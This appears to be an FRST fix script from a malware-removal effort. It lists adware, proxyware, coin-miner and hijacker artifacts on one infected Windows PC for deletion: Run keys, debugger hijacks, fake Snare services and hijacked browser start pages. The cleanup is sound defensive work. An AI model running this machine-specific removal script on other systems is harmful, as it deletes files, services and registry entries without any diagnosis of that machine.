CloseProcesses:
CreateRestorePoint:
C:\Program Files (x86)\Maoha\JiSuZip\JszipSvc.exe
C:\Program Files (x86)\Maoha
() C:\Windows\Temp\g4ED2.tmp.exe
() C:\Windows\Temp\gDA0.tmp.exe
() C:\Users\User\AppData\Roaming\qsbmbhsyi5n\jrtmlrcem5k.exe
() C:\Users\User\AppData\Roaming\fdgsooj4hcw\00vihxx214b.exe
(AC65GVJX) C:\Program Files\ESSRWBD05X\ESSRWBD05.exe
(AC65GVJX) C:\Program Files (x86)\yn1g3hqok2v\RX4FI.exe
(AC65GVJX) C:\Program Files\Q87F5DDL3H\Q87F5DDL3.exe
(AC65GVJX) C:\Program Files (x86)\yn1g3hqok2v\OLLUYEZ0BTTQ3XV.exe
() C:\Users\User\AppData\Roaming\wofdlyh3mtz\jub1mo14lha.exe
(D) C:\Program Files\C1QXFUW6Q6\6F856YMPL.exe
() C:\Users\User\AppData\Roaming\rwheqpsdj5s\ysfsny2kt1i.exe
() C:\Users\User\AppData\Roaming\rgj4geoi4kx\4ofrchtpykc.exe
(D) C:\Program Files\4EA0HTD2Q0\LQFWST2UM.exe
(D) C:\Program Files\6YRM7KI90W\XG4D6LLOO.exe
() C:\Users\User\AppData\Roaming\5k4r2bbnlq1\jt401bjv5lg.exe
(D) C:\Program Files\9IWAGBX2GV\9IWAGBX2G.exe
() C:\Users\User\AppData\Roaming\etexyvrgmh4\jatr0sdxxuh.exe
() C:\Users\User\AppData\Roaming\0awgowyo0ms\0nhwku5oyj2.exe
(D) C:\Program Files\BBZAW6C4VI\BBZAW6C4V.exe
(D) C:\Program Files\Y8MZE1ADXJ\Y8MZE1ADX.exe
() C:\Users\User\AppData\Roaming\ws35pv4otzu\exrir35so13.exe
(Z9OX3L) C:\Program Files\UTQATLWOKH\UTQATLWOK.exe
() C:\Users\User\AppData\Roaming\aesf43dd52u\r23xflwmacl.exe
() C:\Users\User\AppData\Roaming\isMiner\gw64-core2.exe
() C:\Users\User\AppData\Roaming\u5cbuyosxxt\221tqfnete3.exe
(D) C:\Program Files\ZROQ82ZM81\ZROQ82ZM8.exe
(D) C:\Program Files\TTXTUI1V1L\TTXTUI1V1.exe
() C:\Users\User\AppData\Roaming\1nuxxy02ibu\cjuwkzecetj.exe
() C:\Users\User\AppData\Roaming\ocaxkzchr0f\0y51erqgzkl.exe
(Z9OX3L) C:\Program Files\FBTVNMSQKX\FBTVNMSQK.exe
(Z9OX3L) C:\Program Files\T6XZH4WK6T\T6XZH4WK6.exe
() C:\Users\User\AppData\Roaming\4eqli1ue5wl\k1oii1uskfm.exe
C:\Users\User\AppData\Local\Temp\A5HHyOqb2\A5HHyOqb2.ex
() C:\Users\User\AppData\Local\Temp\is-E3GIU.tmp\A5HHyOqb2.tmp
() C:\Users\User\AppData\Roaming\yq4jvrcg1f3\nbpe5thjjcq.exe
(Z9OX3L) C:\Program Files\T1O3O1QIVZ\T1O3O1QIV.exe
(Z9OX3L) C:\Program Files\AA2J6DNVEF\AA2J6DNVE.exe
(Microleaves LTD) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
(Microleaves LTD) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
C:\Program Files (x86)\Microleaves
HKLM\...\RunOnce: [OMEWPRODUCT_OSEO0] => C:\Program Files (x86)\yn1g3hqok2v\OLLUYEZ0BTTQ3XV.exe [592896 2017-05-30] (AC65GVJX) <===== ATTENTION
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
C:\Program Files (x86)\yn1g3hqok2v
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [background_fault] => C:\Users\User\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== ATTENTION
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [0lceb25ruqa] => C:\Users\User\AppData\Roaming\qsbmbhsyi5n\jrtmlrcem5k.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [fm1vdlwdvkk] => C:\Users\User\AppData\Roaming\fdgsooj4hcw\00vihxx214b.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [2VZRB70N841RXSA] => C:\Program Files\ESSRWBD05X\ESSRWBD05.exe [1209344 2017-05-30] (AC65GVJX)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [84UOC78VGV223DT] => C:\Program Files (x86)\yn1g3hqok2v\RX4FI.exe [1209344 2017-05-30] (AC65GVJX)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [WPM8GXB720LN1QN] => C:\Program Files\Q87F5DDL3H\Q87F5DDL3.exe [1209344 2017-05-30] (AC65GVJX)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [YeaDesktop] => C:\Program Files (x86)\YeaDesktop\YeaDesktop.exe [3423744 2017-05-27] () <===== ATTENTION
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [5lobjawg2m4] => C:\Users\User\AppData\Roaming\wofdlyh3mtz\jub1mo14lha.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [PY84BHIZ5CMDX8M] => C:\Program Files\C1QXFUW6Q6\6F856YMPL.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [wkuisp3mqvr] => C:\Users\User\AppData\Roaming\rwheqpsdj5s\ysfsny2kt1i.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [lreja2y0wtw] => C:\Users\User\AppData\Roaming\rgj4geoi4kx\4ofrchtpykc.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [Z7C4D5BZ9F2WNLJ] => C:\Program Files\4EA0HTD2Q0\LQFWST2UM.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [TS83WLB4T2QBS4Q] => C:\Program Files\6YRM7KI90W\XG4D6LLOO.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [hqdfwyqa3qo] => C:\Users\User\AppData\Roaming\5k4r2bbnlq1\jt401bjv5lg.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [ZL9FDGZGNQG2OU1] => C:\Program Files\9IWAGBX2GV\9IWAGBX2G.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [fxza52bswmj] => C:\Users\User\AppData\Roaming\etexyvrgmh4\jatr0sdxxuh.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [iw1qu0gjd1y] => C:\Users\User\AppData\Roaming\0awgowyo0ms\0nhwku5oyj2.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [D1SB538RMCY644W] => C:\Program Files\BBZAW6C4VI\BBZAW6C4V.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [JS7TZIF2ETA7PN2] => C:\Program Files\Y8MZE1ADXJ\Y8MZE1ADX.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [gw64-core2 save settings] => C:\Users\User\AppData\Roaming\isMiner\minerstart.vbs [300 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [g3byw20yxke] => C:\Users\User\AppData\Roaming\aesf43dd52u\r23xflwmacl.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [c4em2sojr4g] => C:\Users\User\AppData\Roaming\u5cbuyosxxt\221tqfnete3.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [DBR5JQTT2Z4GTHD] => C:\Program Files\ZROQ82ZM81\ZROQ82ZM8.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [YVDZ46XHI9O1G98] => C:\Program Files\TTXTUI1V1L\TTXTUI1V1.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [sogi1iwstjp] => C:\Users\User\AppData\Roaming\ws35pv4otzu\exrir35so13.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [1TSZ5QEJDTWRHKP] => C:\Program Files\UTQATLWOKH\UTQATLWOK.exe [1393664 2017-05-30] (Z9OX3L)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [verkzkohve5] => C:\Users\User\AppData\Roaming\1nuxxy02ibu\cjuwkzecetj.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [imdg3tpbdog] => C:\Users\User\AppData\Roaming\ocaxkzchr0f\0y51erqgzkl.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [XF6MGSXG7J4TM0T] => C:\Program Files\FBTVNMSQKX\FBTVNMSQK.exe [1393664 2017-05-30] (Z9OX3L)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [10WOWX1LT7D78XM] => C:\Program Files\T6XZH4WK6T\T6XZH4WK6.exe [1393664 2017-05-30] (Z9OX3L)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [r4eykzsegrv] => C:\Users\User\AppData\Roaming\4eqli1ue5wl\k1oii1uskfm.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [ixom4ida0f2] => C:\Users\User\AppData\Roaming\yq4jvrcg1f3\nbpe5thjjcq.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [4PM26MXLI3ASBRP] => C:\Program Files\T1O3O1QIVZ\T1O3O1QIV.exe [1393664 2017-05-30] (Z9OX3L)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [8AB4MR1Q5RK6XOI] => C:\Program Files\AA2J6DNVEF\AA2J6DNVE.exe [1393664 2017-05-30] (Z9OX3L)
HKLM\...\Providers\qq42p2tw: C:\Program Files (x86)\Bekserikut Log\local64spl.dll [289792 2017-02-03] ()
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {DC988DE4-DE48-11E6-9583-64006A5CFC23} - C:\Users\User\AppData\Roaming\Rerbadomatuvety\Reedgh.dll -> No File
ShellExecuteHooks: No Name - {A4CD8824-4049-11E7-9F11-64006A5CFC23} - C:\Program Files (x86)\Anucephstipaied\Wuteghtplejipy.dll [144896 2017-05-30] ()
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493987296&z=76fd28e9f0f5243a962c461g6zdt4cdtfbfm9o4t3c&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493987296&z=76fd28e9f0f5243a962c461g6zdt4cdtfbfm9o4t3c&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 - No File
R2 ANSARE; C:\Users\User\AppData\Local\ANSARE\Snare.dll [826368 2017-05-08] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-27] (TODO: <公司名>) [File not signed] <==== ATTENTION
C:\ProgramData\BIT
C:\Users\User\AppData\Local\ANSARE
S2 CSHMDR; C:\Users\User\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S2 CWASRE; C:\Users\User\AppData\Local\CWASRE\Snare.dll [828416 2017-05-17] (IntertSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [117424 2017-04-21] () <==== ATTENTION
R2 Kitty; C:\Users\User\AppData\Local\Kitty\Kitty.dll [124928 2017-05-05] (kitty) [File not signed] <==== ATTENTION
C:\Users\User\AppData\Local\Kitty
S2 NPASRE; C:\Users\User\AppData\Local\NPASRE\Snare.dll [830464 2017-05-12] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
R2 SANARE; C:\Users\User\AppData\Local\SANARE\Snare.dll [826368 2017-05-04] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2889896 2016-09-15] (Microsoft Corporation)
S2 snare; C:\Users\User\AppData\Local\snare\Snare.dll [1050112 2017-05-24] (IntertSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
R2 SNAREA; C:\Users\User\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
R2 SNARER; C:\Users\User\AppData\Roaming\SNARER\Snarer.dll [792576 2017-04-07] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\Sh4Service.exe [868024 2017-05-30] (Enigma Software Group USA, LLC.)
S2 terana; C:\Users\User\AppData\Local\terana\terana.dll [908288 2017-05-27] (IntertSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S2 VNASRE; C:\Users\User\AppData\Local\VNASRE\Snare.dll [826880 2017-05-10] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
R2 WANARE; C:\Users\User\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S2 WindowsOfficeSrv; C:\ProgramData\Microsoft\OneDrive\Uploader.dll [108544 2017-04-21] () [File not signed] <==== ATTENTION
R2 WinSAPSvc; C:\Users\User\AppData\Roaming\WinSAPSvc\WinSAP.dll [1932800 2017-05-27] () [File not signed] <==== ATTENTION
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
S2 InstallerService; C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe [X]
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== ATTENTION
S1 mbzhufuj; \??\C:\Windows\system32\drivers\mbzhufuj.sys [X]
2017-05-30 23:12 - 2017-05-30 23:12 - 00000000 ____D C:\Users\User\AppData\Roaming\yq4jvrcg1f3
2017-05-30 23:12 - 2017-05-30 23:12 - 00000000 ____D C:\Users\User\AppData\Roaming\4eqli1ue5wl
2017-05-30 23:12 - 2017-05-30 23:12 - 00000000 ____D C:\Program Files\T1O3O1QIVZ
2017-05-30 23:12 - 2017-05-30 23:12 - 00000000 ____D C:\Program Files\AA2J6DNVEF
2017-05-30 22:42 - 2017-05-30 23:12 - 00000000 ____D C:\Program Files (x86)\Anucephstipaied
2017-05-30 22:42 - 2017-05-30 22:42 - 00000000 ____D C:\Users\User\AppData\Roaming\ocaxkzchr0f
2017-05-30 22:42 - 2017-05-30 22:42 - 00000000 ____D C:\Users\User\AppData\Roaming\1nuxxy02ibu
2017-05-30 22:42 - 2017-05-30 22:42 - 00000000 ____D C:\Users\User\AppData\Local\Kiwertphiverward
2017-05-30 22:42 - 2017-05-30 22:42 - 00000000 ____D C:\Program Files\T6XZH4WK6T
2017-05-30 22:42 - 2017-05-30 22:42 - 00000000 ____D C:\Program Files\FBTVNMSQKX
2017-05-30 22:41 - 2017-05-30 22:41 - 00000000 ____D C:\Users\User\AppData\Roaming\ws35pv4otzu
2017-05-30 22:41 - 2017-05-30 22:41 - 00000000 ____D C:\Program Files\UTQATLWOKH
2017-05-30 19:27 - 2017-05-30 19:27 - 00000000 ____D C:\Users\User\AppData\Roaming\u5cbuyosxxt
2017-05-30 19:27 - 2017-05-30 19:27 - 00000000 ____D C:\Users\User\AppData\Roaming\aesf43dd52u
2017-05-30 19:27 - 2017-05-30 19:27 - 00000000 ____D C:\Program Files\ZROQ82ZM81
2017-05-30 19:27 - 2017-05-30 19:27 - 00000000 ____D C:\Program Files\TTXTUI1V1L
2017-05-30 19:27 - 2017-05-30 19:27 - 00000000 ____D C:\Program Files (x86)\Prfasaretaly
2017-05-30 19:18 - 2017-05-30 19:18 - 00003294 _____ C:\Windows\System32\Tasks\Updater_Online_Application
2017-05-30 19:18 - 2017-05-30 19:18 - 00003258 _____ C:\Windows\System32\Tasks\Online Application V2G3
2017-05-30 19:18 - 2017-05-30 19:18 - 00003258 _____ C:\Windows\System32\Tasks\Online Application V2G2
2017-05-30 19:18 - 2017-05-30 19:18 - 00003258 _____ C:\Windows\System32\Tasks\Online Application V2G1
2017-05-30 19:18 - 2017-05-30 19:18 - 00000400 _____ C:\Windows\Tasks\Updater_Online_Application.job
2017-05-30 19:18 - 2017-05-30 19:18 - 00000368 _____ C:\Windows\Tasks\Online Application V2G3.job
2017-05-30 19:18 - 2017-05-30 19:18 - 00000368 _____ C:\Windows\Tasks\Online Application V2G2.job
2017-05-30 19:18 - 2017-05-30 19:18 - 00000368 _____ C:\Windows\Tasks\Online Application V2G1.job
2017-05-30 19:18 - 2017-05-30 19:18 - 00000000 ____D C:\Program Files (x86)\Microleaves
2017-05-30 19:17 - 2017-05-30 19:17 - 00000000 ____D C:\Users\User\AppData\Roaming\etexyvrgmh4
2017-05-30 19:17 - 2017-05-30 19:17 - 00000000 ____D C:\Users\User\AppData\Roaming\0awgowyo0ms
2017-05-30 19:17 - 2017-05-30 19:17 - 00000000 ____D C:\Program Files\Y8MZE1ADXJ
2017-05-30 19:17 - 2017-05-30 19:17 - 00000000 ____D C:\Program Files\BBZAW6C4VI
2017-05-30 19:14 - 2017-05-30 19:14 - 00003410 _____ C:\Windows\System32\Tasks\SpyHunter4Startup
2017-05-30 19:14 - 2017-05-30 19:14 - 00001132 _____ C:\Users\User\Desktop\SpyHunter.lnk
2017-05-30 19:14 - 2017-05-30 19:14 - 00000000 ____D C:\Users\User\AppData\Roaming\5k4r2bbnlq1
2017-05-30 19:14 - 2017-05-30 19:14 - 00000000 ____D C:\Program Files\9IWAGBX2GV
2017-05-30 18:48 - 2017-05-30 18:48 - 00006076 _____ C:\Windows\System32\Tasks\Coobeck Monitor
2017-05-30 18:48 - 2017-05-30 18:48 - 00000000 ____D C:\Users\User\AppData\Roaming\Microleaves
2017-05-30 18:48 - 2017-05-30 18:48 - 00000000 ____D C:\Users\User\AppData\Local\Draveingplererward
2017-05-30 18:48 - 2017-05-30 18:48 - 00000000 ____D C:\Users\User\AppData\Local\AdvinstAnalytics
2017-05-30 18:48 - 2017-05-30 18:48 - 00000000 ____D C:\Program Files (x86)\Coobeck Monitor
2017-05-30 18:47 - 2017-05-30 18:53 - 00000000 ____D C:\Program Files (x86)\SystemHealer
2017-05-30 18:47 - 2017-05-30 18:47 - 00140800 _____ C:\Users\User\AppData\Local\installer.dat
2017-05-30 18:47 - 2017-05-30 18:47 - 00011568 _____ C:\Users\User\AppData\Local\InstallationConfiguration.xml
2017-05-30 18:47 - 2017-05-30 18:47 - 00000000 ____D C:\Users\User\AppData\Roaming\rwheqpsdj5s
2017-05-30 18:47 - 2017-05-30 18:47 - 00000000 ____D C:\Users\User\AppData\Roaming\rgj4geoi4kx
2017-05-30 18:47 - 2017-05-30 18:47 - 00000000 ____D C:\Program Files\6YRM7KI90W
2017-05-30 18:47 - 2017-05-30 18:47 - 00000000 ____D C:\Program Files\4EA0HTD2Q0
2017-05-30 18:46 - 2017-05-30 18:46 - 00000000 ____D C:\Users\User\AppData\Roaming\wofdlyh3mtz
2017-05-30 18:46 - 2017-05-30 18:46 - 00000000 ____D C:\Program Files\C1QXFUW6Q6
2017-05-30 18:17 - 2017-05-30 19:27 - 00000000 ____D C:\Program Files (x86)\BestZiper
2017-05-30 18:17 - 2017-05-30 18:18 - 00000000 ____D C:\Program Files (x86)\YeaDesktop
2017-05-30 18:17 - 2017-05-30 18:17 - 00016836 _____ C:\Windows\System32\Tasks\Webwatche Frames
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Users\User\AppData\Roaming\UCChannel
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Users\User\AppData\Roaming\gplyra
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Users\User\AppData\Roaming\fdgsooj4hcw
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Users\User\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Users\Public\Documents\XMUpdate
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Program Files\Q87F5DDL3H
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Program Files\ESSRWBD05X
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Program Files (x86)\yn1g3hqok2v
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Program Files (x86)\mgdisk
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Program Files (x86)\Maoha
2017-05-30 18:16 - 2017-05-30 19:26 - 00000000 ____D C:\Users\User\AppData\Roaming\isMiner
2017-05-30 18:16 - 2017-05-30 18:17 - 00000000 ____D C:\Users\User\AppData\Roaming\qsbmbhsyi5n
2017-05-13 03:53 - 2017-05-13 03:53 - 00000000 ____D C:\Program Files (x86)\{D09203A6-089D-4E83-8BBD-03E9C0D6366D}
2017-05-12 23:52 - 2017-05-12 23:52 - 00000000 ____D C:\Program Files (x86)\{1866758A-F2ED-4345-9F97-A0C9D28E924B}
2017-05-12 16:51 - 2017-05-12 16:51 - 00000000 ____D C:\Program Files (x86)\{B758A47C-DD21-45FD-871C-8C2768CE825D}
2017-05-12 14:49 - 2017-05-26 01:01 - 00000000 _____ C:\Windows\SysWOW64\3333
2017-05-12 14:49 - 2017-05-26 01:01 - 00000000 _____ C:\Windows\SysWOW64\2222
2017-05-12 00:29 - 2017-05-12 00:29 - 00000000 ____D C:\Reerdition
2017-05-12 00:29 - 2017-05-12 00:29 - 00000000 ____D C:\Program Files (x86)\{07A9AA6A-EC40-449C-9D38-6D865A6766DA}
2017-05-12 00:06 - 2017-05-16 22:26 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-12 00:06 - 2017-05-12 00:06 - 00000000 ____D C:\Program Files (x86)\Bagsarah
2017-05-12 00:05 - 2017-05-17 15:24 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-09 17:21 - 2017-05-27 03:44 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-17 15:24 - 2017-04-21 17:42 - 00000000 _____ C:\Windows\SysWOW64\11
2017-05-16 22:26 - 2017-04-28 00:36 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-17 15:26 - 2017-04-28 00:37 - 00000000 _____ C:\Windows\SysWOW64\22
C:\Program Files (x86)\yn1g3hqok2v\OLLUYEZ0BTTQ3XV.exe
C:\Users\User\AppData\Local\background_fault\aswRD.exe
C:\Program Files (x86)\YeaDesktop\YeaDesktop.exe
Task: {23F1BC68-3EBD-45D1-988B-31BA23C88A7E} - System32\Tasks\{ECDE3A19-C0BC-4E09-B884-B9D2C8D6FDC6} => pcalua.exe -a "C:\Program Files (x86)\YeaDesktop\unins000.exe"
Task: {2CB1C648-DAB8-4E23-A5F9-445D2E71EE7F} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {8085B184-9AA8-40EF-9C6D-098C132C740A} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-04-18] (Microleaves) <==== ATTENTION
